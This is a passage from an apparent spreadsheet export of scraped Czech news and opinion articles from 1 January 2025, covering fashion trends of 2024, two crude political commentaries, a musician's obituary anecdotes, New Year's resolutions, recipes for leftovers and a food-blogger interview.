Emmanuelle Alt , ale i bývalá první dáma Francie – Carla Bruni. 3 / 14 Přejít do galerie Kolaborace, které nás nejvíce oslovily Kromě velmi elegantní (a pochopitelně hned vyprodané) kapsulové kolekce Zara x Stefano Pilati se to letos skvělými spolupracemi jen hemžilo – Jacquemus a Nike , Skims x Dolce&amp;amp;Gabbana , Nensi Dojaka x Calvin Klein nebo H&amp;amp;M x Charli XCX . Zapomenout nemůžeme ani na JW Anderson x Guinness nebo Dior x Stone Island, i když byla primárně pánská. Tiše se vyprodal collab Y/Project x Salomon i tak trochu pod radarem prošla limitka Maison Margiela x Christian Louboutin , kde se tabi boots proměnily v elegantní lodičky s ikonickou červenou podrážkou. Když už jsme u obuvi, poznamenat musíme i kolaboraci Simone Rocha a Crocs, kterou jsme viděli na londýnském fashion weeku. Siren Clog, Classic Clog a Quick Trail s perlami, krystaly a korálky byly zcela jistě IT kusem roku 2024. 3 / 10 Přejít do galerie Pop-up trendy Chavs, srostlé obočí a Stone Island Brit-pop estetika, a to jak v satiře, tak i v celé své vážnosti, se na chvíli vrátila do ulic díky návratu kapely Oasis , která oznámila turné v roce 2025. Mod hair style Liama Gallaghera , sportovní uniformy nebo i srostlé obočí se opět na chvíli stalo IN. Zobrazit příspěvek na Instagramu Příspěvek sdílený msegonne (@s_segonne) Brat summer Název nové desky zpěvačky Charli XCX se stal slovem roku 2024. Brat se vyznačuje sebevědomým, nezávislým a hedonistickým postojem k životu reflektujícím postoj moderních dívek vůči… tak nějak všemu. Tak trochu reakce na to, že hodným holkám z „old money“ rodin již odzvonilo, a teď zase zpátky k mean girls. View this post on Instagram A post shared by Charli (@charli_xcx) Klíčenky všude, kam se podíváš Miu Miu a Coach otevřeli Pandořinu skříňku a už proces nejde zvrátit. Celý rok na ulicích, v časopisech i v rámci fashion weeků vídáme klíčenky ve všech formách takřka všude a na všem. Trend byl reakcí i na zesnulou Jane Birkin , která měla svoji Birkin kabelku ověšenou různými talismany a korálky . Právě tento trend představil v trochu excesivní formě Coach, Miu Miu a následně Balenciaga – a to od klíčenek ve formě hrníčků, (ne tak) malých plyšových zvířátek až po klíčenky kabelek, které nyní nabízí skoro každý brand. TikTok tento trend pojmenoval jako „ Jane Birkin -ifying your bag“. 3 / 4 Přejít do galerie Burgundy a leopard Asi dva nejvýraznější elementy letošního roku, které nešlo přehlédnout. Od Chanel přes Gucci až po Hermès byly všude – na kabátech, kalhotách, šatech i kabelkách. Kdo neměl, jako by nebyl. Vampirecore Trend, který zcela jistě zavládne v plné kráse až v polovině ledna, až všechny pohltí Nosferatu obsese. Gotická balada Roberta Eggerse, natočená z velké části v Praze , bude mít velký vliv na estetiku roku nadcházejícího. Morbidně bledé tváře, rudé rty (v zimě must have!) a černý monochrom s černou krajkou nebo volány. Yes, please! Met Gala patřilo Johnu Gallianovi Johna Galliana Maison Margiela Haoute Couture Fall Winter 2024 Zendaya ve vintage Givenchy Zendaya v Loewe na press tour filmu The Challengers Louis Vuitton Fall Winter 2024 Na Australské premiéře Wicked Grande oblékla róbu Vivienne Westwood a Ervio zvolila róbu domu Louis Vuitton . Gigi Hadid na Victoria's Secret show 2024 Jacquemus a Nike Zendaya v Maison Margiela Zendaya v Louis Vuitton kostýmu z roku 2013 na press tour filmu The Challengers Na Australské premiéře Wicked Grande oblékla róbu Vivienne Westwood a Ervio zvolila róbu domu Louis Vuitton . Tyra Banks na Victoria's Secret show 2024 Dior x Stone Island Gigi Hadid v Thom Browne V Austrálii oblékla Cynthia Erivo set domu Marc Jacobs a Ariana Grande kostým od Bode. Irina Shayk na Victoria's Secret show 2024 Skims x Dolce&amp;amp;Gabbana Jennifer Lopez v Schiaparelli Zendaya v Thom Browne na press tour filmu The Challengers Na premiéře filmu v Los Angeles Grande oblékla kostkované šaty domu Thom Browne a Cynthia Erivo zelené šaty od Louis Vuitton. Kate Moss na Victoria's Secret show 2024 JW Anderson x Guinness Kendall Jenner ve vintage, 1999 Givenchy Zendaya v Calvin Klein na press tour filmu The Challengers Londýnská premiéra Wicked – Ariana Grande v žluté róbě Ralph Lauren a Cynthia Erivo v Schiaparelli. Adriana Lima na Victoria's Secret show 2024 Zara x Stefano Pilati Nicole Kidman v Balenciaga Zendaya v kostýmu od Vivienne Westwood z roku 1994 na press tour filmu The Challengers Nejvirálnějším lookem se stala róba domu Schiaparelli na londýnské premiéře Wicked. Alessandra Ambrosio na Victoria's Secret show 2024 Maison Margiela x Christian Louboutin Lana Del Rey in Alexander McQueen Zendaya ve vintage šatech z Sweet Disorder Vintage na press tour filmu The Challengers</t>
  </si>
  <si>
    <t>20250101_31_3697687913_d396217a466fc1b8abfd.html</t>
  </si>
  <si>
    <t>d396217a466fc1b8abfd</t>
  </si>
  <si>
    <t>Podívejte se: Tradičního setkání na Veselově</t>
  </si>
  <si>
    <t>Podívejte se: Tradičního setkání na Veselově Zahřáli se svařeným vínem , čajem nebo i něčím ostřejším, popovídali si a popřáli všechno dobré do nového roku 2025. Přátelskému setkání přálo počasí, bylo jasno a teplota kolem nuly. Autor: Vladimír Drvota Autor person Vladimír Drvota</t>
  </si>
  <si>
    <t>20250101_310_3694522421_50776a61b366218b3b1f.html</t>
  </si>
  <si>
    <t>50776a61b366218b3b1f</t>
  </si>
  <si>
    <t>Fialová terapie</t>
  </si>
  <si>
    <t>Fialová terapie 01/01/2025 Politika 0 JAN TICHÝ Pokusil jsem se podívat na Fialovu vládu z jiného úhlu pohledu a nalézt i nějaké ty pozitivní věci, ve smyslu rčení: všechno zlé je pro něco dobré. Tři roky zde probíhá něco jako fialová terapie. Má na nás několik pozitivních účinků, protože nás mnohé zbavuje původních představ a přesvědčení. Podívejme se na to. Přece by nám nelhali. Lžou, a kdo to ještě nevidí je slepý, nebo zaslepený. Přece by nás neokrádali. Kdo lže, ten krade. Okradení jsou nejen důchodci, ale my všichni, co platíme daně a nakupujeme zde zboží a služby. Třicetiprocentní inflace, to je pěkná (státní a legální) zlodějna. Přece by se snažili plnit sliby. Jakože přestanou zemi zadlužovat, sníží byrokracii a úřednický stav. HA HA HA. To už jeden jejich předchůdce říkal, že sliby nebyly zakotveny do reálného rámce. Realita je naprosto opačná než původní sliby. Přece by byli solidární a nechali by si platy zmražené, když plebs chudne. Ani náhodou. Nenažranost a mocichtivost z nich jen kape. Přece nejsou tak nesamostatní, přece nejsou tak zbabělí a hloupí rektální alpinisté. Ale jsou. Přece by necenzurovali a neporušovali svobodu slova? Ale kdež, zavedli nám výběrovou svobodu slova a tu vyžadují a vybrali si i toho, kdo to kontroluje. Jsou to vlastně takoví terapeuti, činí vše proto, abychom se probudili. Dokonce některé komediální výstupy pana premiéra asi vstoupí do dějin tragikomedie, či frašky. A možná i do spisovného jazyka českého, kdy slovem Nutella lze nahradit některá česká vulgární slova. Např. jdeme do Nutelle, ne, už v té Nutelli dávno jsme, je to celé na Nutellu. A protože jsme měli toho silvestra, tak ještě několik vtipů od smějících se bestií: Sejde se mafián, lhář, zloděj, feťák a idiot. Co to je? Vláda ČR. Bavěj se dva mladíci. „Hele, tady jsem si vygůglil, že dřív lidi potravu lovili.“ „Já bych taky lovil, ale nevím, kde ta pizza žije.“ Přijde mladík do hospody a poručí si pivo . Hostinský si ho prohlíží a zeptá se: „občanku máš?“ „Jo, tady v mobilu“. „Tak to máš nárok na e- pivo , půjč mi ten mobil“, hostinský pak něco kliká do mobilu a pak ho mladíkovi vrátí. „A co to pivo ?“ „Už ho tam máš, klikni na vypít!“ Před Strakovou akademií pobíhá Horymír. Ochranka se ho zeptá, kdo je a co tady dělá. „Jsem Horymír a hledám svého Šemíka. Říkali mi, že utíkal k Neumětelům, tak jsem tady.“ Já jen doufám, že dalších fialových terapeutů už nebude třeba. Co si o tom myslíte? Počet přečtení: 895 Autor: redakce</t>
  </si>
  <si>
    <t>3540</t>
  </si>
  <si>
    <t>4059.9999999999995</t>
  </si>
  <si>
    <t>20250101_311_3694505813_3328c3b4931c06c5a80a.html</t>
  </si>
  <si>
    <t>3328c3b4931c06c5a80a</t>
  </si>
  <si>
    <t>Stockholmský syndrom</t>
  </si>
  <si>
    <t>Stockholmský syndrom WA Toto je reakce na článek Ivánku, kamaráde – pirátská verze , který byl publikován pár týdnů zpátky a týkal se Bartošova zpackaného projektu. Projekt digitalizace stavebního řízení dostane tedy strana, co nám již předvedla, jak se má digitalizovat v minulosti na projektu datových schránek. Naprosto jiná třída než Bartoš a piráti. Připomeňme si co to jsou datové schránky. Vážení čtenáři pokud něco jíte nebo pijete, tak si dejte pozor aby Vám nezaskočilo – Datové schránky je služba na odesílání zpráv přes internet, tato služba stála daňové poplatníky 3 miliardy za vývoj a první tři roky provozu. V dnešních penězích to je zhruba 5 miliard (dle kalkulačky na penize.cz). Já již slyším jak pan daňový poplatník tleská, jak ten projekt funguje právě kvůli tomu že stál 3 miliardy, a kdyby stál jen 3 mega tak to bude taky nefunkcni a taky na hovno. Ti bystřejší uživatelé třeba ví, že existuje něco jako e-mail, ti z IT dále ví, či by aspoň měli vědět, že dále pro šifrování obsahu, a ověřování identity odesílatele i příjemce existuje GPG/PGP. Nicméně řešení postavené na 40 let staré technologii je prostě moc levné a tedy uplně napíču. Dokonce by na to ani nemohli školit úředníky, protože i ten nejblbější úředník ví co to je email. Prostě všechno špatně. Mě by třeba zajímalo jestli českým nevolníkům připadá normální se vůbec doprošovat vrchnosti, když si chce na svém pozemku stavět ať už garáž, nebo nedej bože třeba dům. Mě teda ne, v Polsku jim to taky nepříšlo normální, možná toto je jeden z mnoha důvodů proč to v Polsku nejde tak do píče jak u nás. V Polsku se ruší byrokracie, a u nás máme lidi kteří jsou naštvaní z toho, že stát vydal JEN 300 mega na to, aby je mohl lépe kopat do koulí. Bohužel zde zase narážíme na problém, že pokud stát nebude vyžadovat stavební povolení, pak nebude potřebovat ani ty úředníky okolo, ani žádné softwary a servery. Co by pan daňový poplatník pak dělal se svýma penězma? Jeden by si skoro myslel, že jsou mezi námi tací, kteří trpí stockholmským syndromem a nedokáží si již představit život bez státní boty v zadnici. Nalejme si čistého vína . IT projekty se málokdy povedou odhadnout na první dobrou a to i v soukromé sféře. Skoro vždy nastanou nějaké problémy. Dle mých zkušeností to jsou nejčastěji problémy výkonnostní, kdy se zapomene něco někde naškálovat, někde jinde se zase neodhadne kolik dat bude systémem protékat, někde jinde se zase 1 uživatelovi z 100 podaří dostat do stavu, na který nikdo nepomyslel a nepopsal. Je to docela normální. Co mě naopak zaráží je, jakým způsobem stát řešil nasazení. Soukromý sektor výše popsané problémy dokáže velmi rychle odhalit třeba díky technice nazvané AB testy . Pokud bychom to převedli na projekt stavebního řízení znamenalo by to buď nový systém dát třeba jen několika úřadům, nebo systém využívat jen pro řízení které potřebuje sám stát. Toto naprosto bylo v kompetenci Bartoše. Další problém na který už Bartoš neměl žádný vliv je, že systém se brání změnám. Jeden můj kolega, řešil někdy okolo roku 2011 IT zakázku pro ministerstvo financí. Setkával se s úředníky z FÚ jakožto budoucími uživateli, i s různými obtloustlými náměstky a ministry, kteří ten projekt zaštiťovali ze strany klienta – státu. Má z toho velmi vtipné příhody. Vypíchnu tu jen jedenu – když se řešilo že lejstro nemusi ouřada přepisovat z papíru do magické krabičky zvané počítač, a že by to šlo zautomatizovat a ulehčit jim tak práci, tak se vrchní úředník z FÚ rozčílil “ale to ne jako, že my tu pak budeme vyhazovat nějaké lidi”. Další problém, který si Bartoš neuvědomil je vendor lock. Ministři z ODS už vydali vyjádření, že projekt se musí přepsat od nuly. To je zajimavý protože, dle seznam zpráv a i dle statistik ČSÚ byl systém do jisté míry funkční. Každý rok od nějakých 2015 klesne počet povolených stavebních řízení o pár tisíc. Má to sestupnou lineární tendenci, i po nasazení Bartošova systému nedošlo k žádnému většímu poklesu, takže systém je funkční, ale je třeba to podojit. Pan Bartoš si neuvědomil jednu věc, která platí i pro soukromou firmu. A to že na vendor lock se KURVA nehrabe. Bartoš neměl přihrát zakázku firmě napojené na Piráty, ale firmě napojené na ODS . Všichni by byli spokojeni. Plebs by zaplatí daně, pan Bartoš by místo plánované ceny 1.5 miliardy dohodl cenu 1.4 miliardy, a kmotři z ODS by nakonec tu miliardu dostali. Win-Win řešení. Dalším střípkem do mozaiky jsou expertní hlavy které to komentují v televizích. “Ale on to je systém složitý, je potřeba přístup do několika databází”. A zde se ptám no a KURVA co? Jednak to není žádný technický problém, jednak jsou to právě ti politici a ti lobbisti, kteří ty zákony takto zkomplikovali, a to právě z důvodu aby se na tom mohli více napakovat. Já, DOPÍČI, třeba nechci, aby se mi mohla každá Kelišová, která se ani nedožije konce stavby, vyjádřit že se jí můj projekt nelíbí a neustále se odvolávat a prodlužovat dobu řízení. Jenže pokud mezi námi existují lidé, kteří se rozzlobí na to, že systém ve stylu “todo aplikace” pro pár stovek úředníků stojí JEN 300 mega je změna v nedohlednu. Nakonec si myslím si že je docela škoda, že Piráti jako strana v podstatě skončili. Pan Bartoš a jeho banda kryplů měli na to, to tady do pár let vše rozmrdat, jen kdyby dostali více moci. Následně by existovala nenulová šance, že by se do vedení dostal někdo aspoň trochu normální. Bohužel k tomu nedošlo a tato zářná budoucnost tak končí, budeme tu další desetiletí trpět telenovelu “Kdo je dnes větší komunista” mezi ODS a ANO. WeaponizedAutism The post Stockholmský syndrom first appeared on .</t>
  </si>
  <si>
    <t>8700</t>
  </si>
  <si>
    <t>20250101_312_3694505443_51a2f1c20b809a2e0594.html</t>
  </si>
  <si>
    <t>51a2f1c20b809a2e0594</t>
  </si>
  <si>
    <t>Petr Motýl: Hospůdka – Praha Dejvice</t>
  </si>
  <si>
    <t>Petr Motýl : Hospůdka – Praha Dejvice středa 1. ledna 2025 Petr Motýl Hospůdka – Praha Dejvice ožralí studenti ožralí docenti o kus dál stejný obrázek ožralí studenti zblblí docenti o kus dál stejný obrázek zblblí docenti ožralí studenti prostě dvě vysoké školy (Cit. z: Motýl, Petr . 10 000 piv . Vydal Host, Brno , 2007.) Autor: Karel Škrabal Autor person Karel Škrabal</t>
  </si>
  <si>
    <t>20250101_313_3694513385_1786ba9d4c658bbaa20b.html</t>
  </si>
  <si>
    <t>1786ba9d4c658bbaa20b</t>
  </si>
  <si>
    <t>Ivo Pešák říkával: Denně 20 piv, a to nejdu do hospody. Žil na plno, zemřel na operačním stole</t>
  </si>
  <si>
    <t>Ivo Pešák říkával: Denně 20 piv , a to nejdu do hospody. Žil na plno, zemřel na operačním stole Ivo Pešák , uznávaný hudebník s vizáží nemotorného týpka s plnovousem, doplatil na svou životosprávu. Miloval všechno, co bylo nezdravé. Tučná jídla, alkohol . V ničem se nešetřil. „Užíval si života plnými doušky. Hodně kouříval a měl rád pivo . Říkával: ‚Denně 20 piv a to nejdu do hospody.‘ Vždycky to byl ale totální profík. Nikdy se nestalo, že by nepřišel na zkoušku nebo na kšeft. Vždy byl perfektně připravený. Totální sluchař, hrával ve filharmonii,“ zavzpomínal pro web Prima ženy Václav Upír Krejčí, který s Pešákem tvořil hudební dvojici nazvanou Dýza Boys. MOHLO BY VÁS ZAJÍMAT: Údajný utajovaný syn zpěváka Karla Gotta promluvil. Jméno jsem dostal po slavném herci, řekl. Co o sobě a svém soukromí ještě prozradil? Několik měsíců před tím, než Ivo Pešák nečekaně zemřel, odcestoval se skupinou na pozvání koncertovat do amerického Chicaga . „Když jsme tam přiletěli, Ivo povídá, že musí zavolat manželce, aby neměla starost. ‚To není možný, Upíre ! Já do mobilu třikrát naťukám PIN, a ono mi to napíše, že to chce PUK,‘ říkal. Tak si zablokoval telefon. Asi za pět dní mě požádal, jestli mu půjčím mobil, aby zavolal své ženě Miládce. Vytočil jsem její číslo a předal mu můj telefon. ‚Nazdar Miládko, prosím tě, ty dva litry vodky, co si zabalila do těch ručníků, tak vydržely. Jednu už mám vypitou. Ahoj,‘ sdělil jí Ivo a zavěsil,“ popsal s úsměvem Upír Krejčí . Po návratu domů Pešáka odvezli do nemocnice. „Asi za měsíc mi volá a říká: ‚ Upíre , manželka a primář mně chtějí udělat bypass, co ty na to?‘ Odpověděl jsem mu, že si ho nevezmu na svědomí a že se musí rozhodnout sám. ‚Tak to udělám,‘ oznámil mi. A bohužel na tom operačním stole tam zemřel... Byl to bezvadnej člověk. Chybí mi strašně moc. Pořád je to silný... Mám ho pořád uloženého v mobilu, mám pocit, že tady stále je,“ prohlásil Upír Krejčí. Ivo Pešák se během života stačil oženit dvakrát. S první manželkou měl dva potomky, s druhou ženou Miladou děti neměli. Právě s ní prožil posledních téměř 30 let svého života. Během komického čísla tekla krev Nejvíce se proslavil ve skupině Banjo Band Ivana Mládka , se kterým pravidelně účinkoval v televizních pořadech. Obvykle hrával naivní hlupáky. „V mnoha případech se to Ivovi líbilo, v mnoha zase ne. Ale užili jsme si strašně legrace, víc v šatně než na jevišti. Jednou jsem ho v rámci jedné scénky měl bouchnout po hlavě balalajkou. Jedna byla opravdová, druhá falešná. Přestože to bylo všechno pečlivě nazkoušené, do ruky se mi dostala ta opravdová. Pešákovi tekla po hlavě krev a Ivan Mládek mě pak honil po divadle,“ přidal jednu z příhod Václav Upír Krejčí. MOHLO VÁM UNIKNOUT: Jaroslav Suchánek , legendární televizní komentátor a otec herce Michala Suchánka . Prožívám nejblbější část života, zůstal jsem úplně sám, smutní</t>
  </si>
  <si>
    <t>20250101_314_3694501151_e33a927824c2e8e8ebae.html</t>
  </si>
  <si>
    <t>e33a927824c2e8e8ebae</t>
  </si>
  <si>
    <t>Novoroční předsevzetí? Dejte si taková, která vás dostanou do pohody</t>
  </si>
  <si>
    <t>Novoroční předsevzetí? Dejte si taková, která vás dostanou do pohody Nejde o nic, co by vás nějak zásadně omezovalo nebo strhalo. Pokud tedy dokážete být hodinu bez mobilního telefonu a měsíc bez alkoholu Tereza Hermochová Novoroční předsevzetí je prapodivná tradice. Na začátku roku si stanovíme různé cíle, ale za pár týdnů už na ně zapomeneme, protože se zkrátka zajíždíme do „normálních kolejí“ běžného roku. On na ty cíle vlastně není vůbec čas. Často děláme tu chybu, že si dáváme předsevzetí příliš nerealistická, která vyžadují drastickou změnu životního stylu. Sem patří věci jako zhubnout 10 kilo za měsíc, už nikdy nejíst v mekáči, najít si lepší práci s dvojnásobným platem a dvakrát méně povinnostmi, do roka si najít partnera, vdát se a mít dítě (oženit se a nemít dítě), naučit se plynně cizí jazyk a trávit víc času s rodinou. Zkuste přežít šest měsíců, aniž byste si koupili cokoliv nového. Třeba si uvědomíte, že toho k životu zas tolik nepotřebujete. Není divu, že mnoho z odvážných plánů po měsíci ztroskotá. Nový rok sice může být příležitostí ke změně nebo novému začátku, k velkým změnám ale vedou malé krůčky, proto je na nápravě třeba pracovat postupně. Níže je několik tipů britského magazínu Mirror, jak svůj život začít měnit pomaličku, ale jistě. 1. Vypínejte si telefon Naučte se být offline trochu častěji a třeba si jednou denně úplně vypnout mobil. Vaše rodina jistě ocení, když se jí při večeři budete spíš dívat do očí a vyprávět o svém dnu, než se probíjet do dalšího levelu v Candy Crush. 2. Nekupujte tolik věcí Používejte ty staré a více si važte věcí, které už máte. Zkuste přežít šest měsíců, aniž byste si koupili cokoliv nového. Třeba si uvědomíte, že toho k životu zas tolik nepotřebujete. 3. Měsíc bez alkoholu Pusťte alkohol k vodě a játra na dovolenou, připojte se třeba k české výzvě Suchej únor. V Británii a Irsku zase lidé masivně dodržují Suchý leden. Dostanete možnost poznat, jak na tom s alkoholem vlastně jste. Pokud je to na vás přece jen moc, zkuste začít zlehka a třeba přijít alespoň třikrát týdně do práce bez kocoviny. 4. Navštěvujte příbuzné Zkuste se podívat častěji za svými příbuznými. Obzvláště za těmi, kteří nejsou tolik mobilní nebo žijí na druhém konci republiky. 5. Slavte své úspěchy Lidé s nízkým sebevědomím často znevažují své úspěchy a přičítají je štěstí nebo náhodě. Zaměřují se na nedokonalosti spíš než na to, co se povedlo. Lidé se zdravým sebevědomím své úspěchy umí oslavovat. Když je někdo pochválí, poděkují a uznání neodmítají. Tak to třeba taky zkuste. Jak vidíte, výše zmíněná předsevzetí nejsou nijak zákeřná. Navíc nemusíte hned plnit všechna. Dvojka se dá třeba skvěle skloubit s trojkou. Pokud si dáte únor bez alkoholu , nemusíte pak celý únor (zbytečně) kupovat alkohol . No a v březnu můžete slavit úspěch. Třeba s příbuznými. Zdali ještě s alkoholem , to necháme na vás. Milada Kadeřábková foto: Shutterstock, zdroj: Mirror Líbil se vám článek? Přihlašte se k odběru newsletteru a dostávejte to nejlepší z Flowee přímo do svého mailu. zdroj: Shutterstock Autor: Tereza Hermochová, Milada Kadeřábková Autoři person Tereza Hermochová Milada Kadeřábková Rubrika transition_slide Civilizace</t>
  </si>
  <si>
    <t>44550</t>
  </si>
  <si>
    <t>26720</t>
  </si>
  <si>
    <t>20250101_315_3694511834_53dbe8763e7e012bb3a8.html</t>
  </si>
  <si>
    <t>53dbe8763e7e012bb3a8</t>
  </si>
  <si>
    <t>Co se zbytky ze Silvestra? Sýr využijte na zapékání, uzeniny do quiche a z pečiva připravte krutony</t>
  </si>
  <si>
    <t>Co se zbytky ze Silvestra? Sýr využijte na zapékání, uzeniny do quiche a z pečiva připravte krutony 01.01.2025 ZDROJ: Shutterstock sdílet: Vítejte v roce 2025, milí čtenáři, zapálení kuchaři a vášniví foodies. Z redakce Apetitu vám přejeme chutný a voňavý nový rok a těšíme se na všechno, co spolu zažijeme. Než se ale pustíme do nových receptů a zajímavostí ze světa jídla, pojďme udělat tlustou čáru za rokem minulým a zbavit se silvestrovských zbytků, které pravděpodobně zaplňují vaši ledničku. Udržitelnost je trend, který se vyplatí následovat. Vzhledem k tomu, že jsme vás v posledních dnech roku 2024 hojně zásobovali tipy na silvestrovské pohoštění, považujeme za fér doporučit vám i to, jak využít, co po večírku zbylo. Že je sýr oschlý a na dně lahve vína jen poslední deci, takže byste to nejraději vše vyhodili a věnovali se novoroční čočce? To by byla škoda! My vám poradíme, jak s zbytky kreativně pracovat, jak je využít a zároveň si na nich pochutnat. ČÍST ČLÁNEK Tvrdý sýr Po silvestrovských oslavách vám možná zbyly sýry typu čedar nebo eidam, které byly součástí obložených mís. Co s nimi? Do karbanátků: Zkuste kostičky sýra použít do směsi mletého masa na výrobu sekané či karbanátků. Na gratinování: Posypte kostičkami sýra pekáč s těstovinami nebo zeleninou, doplňte kořením či bylinkami a všechno zapečte v troubě. Na vylepšení polévek: Kostičky sýra můžete použít buď na gratinování polévky přímo v miskách (jako se to dělá u francouzské cibulačky), nebo udělejte delikátní sýrovou omáčku. RECEPT Šunky a salámy Připravili jste toho moc na oblíbené obložené mísy nebo pinterestově dokonalé charcuterie a teď je vám líto, že zbyla šunka i salámy a rozhodně nevypadají nikterak vábně? Nevadí! Zapečené toasty a panini: Asi nejrychlejší řešení je využít je zbytky na rychlou svačinu, stačí jen přidat máslo, plátek sýra a trochu kečupu nebo hořčice. Domácí pizza: Ať už máte těsto na pizzu koupené nebo ho vyrobíte doma, zbytky šunek a salámů se budou skvěle hodit. Doplňte čímkoli, co máte na pizze rádi: sýrem, houbami, olivami nebo cibulí. Ananas necháme na vaší osobní zodpovědnosti. Slané koláče či quiche: Další možnost, jak zbytky uzenin využít a zapečením jim dodat nový rozměr jsou nejrůznější koláče. Smíchejte do směsi s vejci, smetanou a sýrem a nalijte např. na listové těsto. RECEPT Starší chléb a pečivo Pokud vám po silvestrovských oslavách zbyl chléb nebo pečivo, můžete je přeměnit na chutné krutony, které budou skvělým doplňkem k polévkám nebo salátům. Krutony do polévek nebo salátů: Starší chléb nakrájejte na malé kostičky a opečte je na pánvi s trochou oleje, česneku a bylinkami (například tymiánem nebo rozmarýnem). Krutony jsou skvělým doplňkem k polévkám (například k rajčatové nebo k zimní dýňové) nebo k čerstvým salátům, kterým dodají texturu i chuť. Krutony na snídani: Připravte si sladkou verzi krutonů! Starší pečivo nakrájejte na kostičky, osmahněte na másle a posypte skořicí, cukrem a pokapejte trochou medu. Takto připravené krutony můžete použít do jogurtu, k tvarohu nebo na snídani s ovocem. Do nádivky: Pokud vám zbyly staré rohlíky nebo housky, stačí je nakrájet na malé kostičky, smíchat s vejci, mlékem, sýrem a bylinkami a upéct v troubě jako nádivku. ČÍST ČLÁNEK Víno , likér nebo pivo Zbyly vám po večírku otevřené lahve vína , piva nebo likérů? Nemusíte je dopíjet a ani je nechat zkazit, využijte je při vaření nebo pečení. Víno do omáček či do risotta: Víno je skvělý základ pro přípravu mnoha pokrmů. Z červeného vína je dokonalá omáčka k červenému masu, z bílého pak k drůbeži a k rybám a stejně tak se bez něj neobejde žádné risotto. Likér do dezertů: Zbytky likérů skvěle doplní krémy do zákusků, ozvláštní dorty a nemusíte se jich bát ani při přípravě domácí zmrzliny. Pivo do marinády: Podusit na pivu hovězí nebo zbytek alkoholu využít na naložení masa? To je docela běžné využití piva . Co ho třeba zkusit přidat do těsta na chleba nebo vyzkoušet silnou zimní polévku? Zdroje: Foodblog.mt, Platformgifted.eu, Funcheaporfree.com Autor: Autor: | katerina.osick…</t>
  </si>
  <si>
    <t>113370</t>
  </si>
  <si>
    <t>20250101_316_3694508638_0f06af1348e8a1079775.html</t>
  </si>
  <si>
    <t>0f06af1348e8a1079775</t>
  </si>
  <si>
    <t>Lukáš Hejlík: gastromapa funguje stále nezávisle</t>
  </si>
  <si>
    <t>Lukáš Hejlík : gastromapa funguje stále nezávisle Šimon Hauser Doporučujeme Už jedenáct let cestuje Lukáš Hejlík po celém Česku a píše o podnicích, ve kterých mu chutnalo. Rozhovor s ním, který vyšel ve vydání MAM 13/2024, vám nyní jako sváteční dárek zpřístupňujeme celý. V rámci Gastromapy jste již navštívil několik tisíc podniků. Jak vlastně vznikla? Už je to docela dávno — přesně 20. dubna 2013 v Jeseníku . Ten příběh je docela romantický, protože tehdy jsme se s manželkou znali jenom krátce a vyrazili jsme společně na menší výlet. I když prostředí nebylo nic moc, jídlo nám chutnalo. V té době jsem působil jako moderátor soutěže Food blog roku, a právě díky této zkušenosti jsem začal přemýšlet o tom, že bych se mohl stát food blogerem. Uvědomil jsem si, že díky divadlu hodně cestuji, a navíc mě baví jídlo, takže bych jím klidně mohl být. Nejsem ale zdatný fotograf ani textař, a proto jsem zůstal u toho, že pouze referuji o adresách jednotlivých podniků. Měl jste úspěch už od začátku? Můj první report četlo šest lidí, ale vydržel jsem a zůstal u toho. Dodnes, po jedenácti letech, to dělám úplně stejně. Jestli něco definuje můj úspěch, tak je to vášeň a vytrvalost, což zní možná docela neefektně, ale zároveň je to efektivní. Je důležité prostě vydržet a věřit. Byl to tedy spíše koníček? Nebo jste chtěl rozjet byznys? Koníček je to stále. Gastromapa funguje dál nezávisle. V jakémkoli podniku, který navštívím, si za jídlo platím. Nikdo dopředu neví, že přijdu. Takhle to funguje jedenáct let. Jediná věc, na které vydělávám, jsou mé knihy. A prodávají se dobře. Pak jsou tu samozřejmě nějaká partnerství a ambasadorství, které mám na základě toho, že dělám nejen Gastromapu. Tohle je můj byznysový model, ale stále je to velmi autentické. Nyní možná recenze píšu s větší relevancí a s větším uvědoměním, že má slova mají také nějaké důsledky a já odpovědnost. Časopis Marketing &amp;amp; Media přináší rozhovory se zajímavými a inspirativními osobnostmi každý týden. Nenechte si ujít žádný z nich a využijte nabídky předplatného na našem e-shopu. Takže se za ty roky skoro nic nezměnilo? Příspěvky jsou samozřejmě delší, ucelenější a bohatší o předchozí zkušenosti, které do hodnocení promítám. Mám větší přehled a srovnání. Mé příspěvky už sice nečte šest lidí, ale v průměru šedesát tisíc lidí, jinak je vše stejné. Setkal jste se s kritikou vašeho hodnocení? V jiných rozhovorech jste říkal, že některým lidem například vadilo, že sami nemohou hodnotit… Aplikaci Gastromapy používá již 400 tisíc lidí a všichni uživatelé mají možnost podat zpětnou vazbu anebo vstoupit do diskuse na Facebooku. Tam mohou zanechat ohlas, jaký chtějí. Má aplikace je uživatelsky protipól serverů, jako je Tripadvisor, které se v podstatě mění v hnojomety nespokojených lidí. Proto dělám blog, který je velmi subjektivní a pokud někomu můj názor a náhled na věc vyhovuje, tak ho sleduje. Pokud ho naopak irituje, tak ho nesleduje. Každý den jsem na Facebooku a odpovídám na jakýkoliv komentář, nikdy jsem nikoho nevymazal nebo „nebanoval“, takže možnost diskutovat je poměrně velká. Když zmiňujete aplikaci, jak náročné ji bylo vyvinout? První měsíc byla placená, poté byla zdarma. Plánujete nějaké novinky? Neplánuji, v současné době mě trápí její provoz, je to neskutečně drahé. Pouze údržba mě stojí jednorázově třeba sto tisíc korun, navíc jsou to v podstatě neviditelné věci. Teď spíš přemýšlím, zda neudělat nějakou jinou, větší změnu. Máte už nějakou představu, jakou změnu? Moc ne. Lukáš Hejlík Český divadelní a filmový herec je také autor projektu scénického čtení Listování a projektu Gastromapa Lukáše Hejlíka . Zahrál si i v několika televizních seriálech. Když začal jezdit po celé České republice s projektem Listování, tak hledal, kde se nejlépe najíst. To ho dovedlo až ke startu vlastního projektu Gastromapa, kde bloguje o restauracích, kavárnách, bufetech a dalších typech podniků, které navštívil. Postupně se tato mapa stala uznávanou a vyhledávanou natolik, že přibyl online pořad, mobilní aplikace a také několik knih. Změnila se nějak gastronomie od doby, kdy jste s projektem začal? Ano, značně. Zrovna s Gastromapou jsem zažil ten největší boom v gastronomii. Jídlo se začalo stávat tématem, otevíraly se duchem mladé podniky, které byly hravé a zkoušely v regionech věci, na které lidé nebyli úplně zvyklí. Šly na to riskantně, inovativně a přinášely do měst nebo regionů trendy. Jak na to zákazníci zareagovali? Kvitovali to. Zvedli se a začali jezdit během volna nebo víkendů a prázdnin na místa, která podřizovali tomu, kde budou jíst, co budou jíst a co uvidí. Jídlo se konečně začalo stávat důležitou životní hodnotou. Mám radost, že jsem u toho byl. Myslím si, ať už to zní sebevíc namyšleně, že jsem tomu i nějakou měrou přispěl. Takže by 